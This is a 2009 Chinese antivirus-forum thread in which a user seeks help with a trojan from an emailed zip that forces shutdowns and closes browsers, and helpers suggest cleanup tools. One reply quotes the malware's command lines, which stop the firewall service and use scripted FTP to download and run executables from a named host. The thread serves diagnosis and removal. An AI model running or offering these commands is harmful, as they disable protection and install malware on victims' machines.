瑞星卡卡安全论坛

首页 » 技术交流区 » 可疑文件交流 » (附档)到计时60秒关闭电脑,不能复制,浏览器打开后自动关闭(IE、Firefox、腾讯等)
匕首雨 - 2009-10-15 9:05:00
附档为“可疑文件”

各位朋友帮帮忙,现瑞星监控是红色的。。。

收到一朋友发的邮件,禮物.zip (1KB)。打开后中毒 了。。。


描述:
1.)到计时60秒关闭电脑,不能复制,浏览器打开后自动关闭(IE、Firefox、腾讯等)
outlook打不开,图片也打不开,电脑启动后插入U盘无法找到(需重启前插入电脑才可找到U盘),通过QQ传送文件另存为点确定时,QQ会立即无响应。

2.)中毒电脑为繁体XP.  Windows XP Home Edition Version 2002 Service Pack 3

3.)现雅虎邮箱的病毒附近无法下载(Norton AntiVirus)---刚收到病毒邮件时可以下载,Norton AntiVirus也没检测到病毒,二天后再打开此邮件,显示“检测到病毒,需要下载的附件中含有无法被删除的病毒。”


------------------------------------------------------------------------------------------------------------------------
附档确实为样本(快捷方式病毒吧)---10.16重新上传
)--另我可提供邮件转发,要的速度,时间长了病毒就会被邮箱限制而无法下载。。


中毒方式:
1.)直接通过邮箱双击压缩文件
2.)下载后双击压缩文件
3.)解压后双击文件。。

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.2)

附件: 禮物.zip

附件: 情色喜劇之我愛友家...zip

附件: 禮物.zip
sinoer - 2009-10-15 9:10:00
lz提交的不是样本原文件,只是个快捷方式
  您遇到的问题可以试试修复rpc
    参考:http://bbs.ikaka.com/showtopic-8561436.aspx
匕首雨 - 2009-10-15 9:15:00
刚发现,右击“我的电脑”属性,“系统属性”打开后,倒计时自动关闭电脑没有再出现,
之前每隔1分钟左右输入shutdown -a才行。。。

详情见我在“反病毒/反流氓软件”发的贴子

------样本无法提供了-----

备注﹕ 附有转发邮件。

您发送的邮件:

> 日期: Wed, 14 Oct 2009 17:40:19 -0700 (PDT)
> 主题: 转发: 我做好了,累~~→
> 大小: 7576 字节
被检测出带有病毒:Trojan-Downloader.Win32.Pif.qe

无法发送到<4078********@qq.com>

不会再有任何动作来尝试发送你的邮件了。 请联系你的系统管理员或先通过其它非电子邮件的方式向你的朋友发送信息以免耽误。
sinoer - 2009-10-15 9:21:00
全盘搜索下面的文件
t . v b s
f . b a t

看看vbs和bat里调用什么可疑程序,相关的东西统统删掉,然后再搜索下注册表
sinoer - 2009-10-15 9:24:00
邮件上报既然回复了,可以按照邮件说明处理
匕首雨 - 2009-10-15 9:25:00

搜索也被病毒改了。。。。点击搜索后,没有反应

附档我是在MSN邮箱下载的(雅虎现无法下载),应该就是样本吧,因为我中毒时正在上网,所以。。。

雅  -虎的邮箱病毒无法传到QQ邮箱,显示如上。。。
sinoer - 2009-10-15 9:52:00
1.下载“建立安全环境工具”
链接地址:http://bbs.ikaka.com/showtopic-8547280.aspx
2.下载木马群专杀工具专杀:
http://dl.rising.com.cn/DownLoadInfo/VirusTools_More.shtml
3:下载橙色八月专用提取清除工具:
http://dl.rising.com.cn/DownLoadInfo/2008-04-26/1209209418d46489.shtml
使用这些工具后再运行瑞星查杀
  使用第三方引导盘搜索前面说的几个文件
networkedition - 2009-10-15 10:24:00
系统现在是否正常:kaka2: 建议反病毒区上传sreng日志诊断一下。
豪斯登堡新郎 - 2009-10-15 17:15:00


引用:
%ComSpec% /c set m=y&set e=t &set o=.&set u=03&set s=p -s:d&set t=echo &echo %t%o ftp%o%g%u%z%o%com^>d>b&echo %t%aa33^>^>d>>b&echo %t%bb33^>^>d>>b&echo %t%ge%e%%e%t.vbs^>^>d>>b&echo %t%b%m%e^>^>d>>b&echo ft%s%>>b&echo start t.vbs>>b&ren b f.bat&call f.bat&




引用:
cmd.exe /c net stop sharedaccess&echo o www.g03z.com>i.i&echo aa33>>i.i&echo bb33>>i.i&echo recv d d.exe>>i.i&echo bye>>i.i&ftp -s:i.i&del i.i&d.exe&echo o www.g03z.com>u.u&echo aa33>>u.u&echo bb33>>u.u&echo get s s.exe>>u.u&echo bye>>u.u&ftp -s:u.u&s.exe&del u.u&del ?.vbs&del s.exe d.exe&start http://buy.yahoo.com.tw/&del ? ?.bat


通过ftp下载s.exe和d.exe
匕首雨 - 2009-10-16 10:45:00
看不懂呀:kaka2:
sinoer - 2009-10-16 10:54:00
搜索t.vbs,f.bat,s.exe,d.exe,搜索到的都删掉
1
查看完整版本: (附档)到计时60秒关闭电脑,不能复制,浏览器打开后自动关闭(IE、Firefox、腾讯等)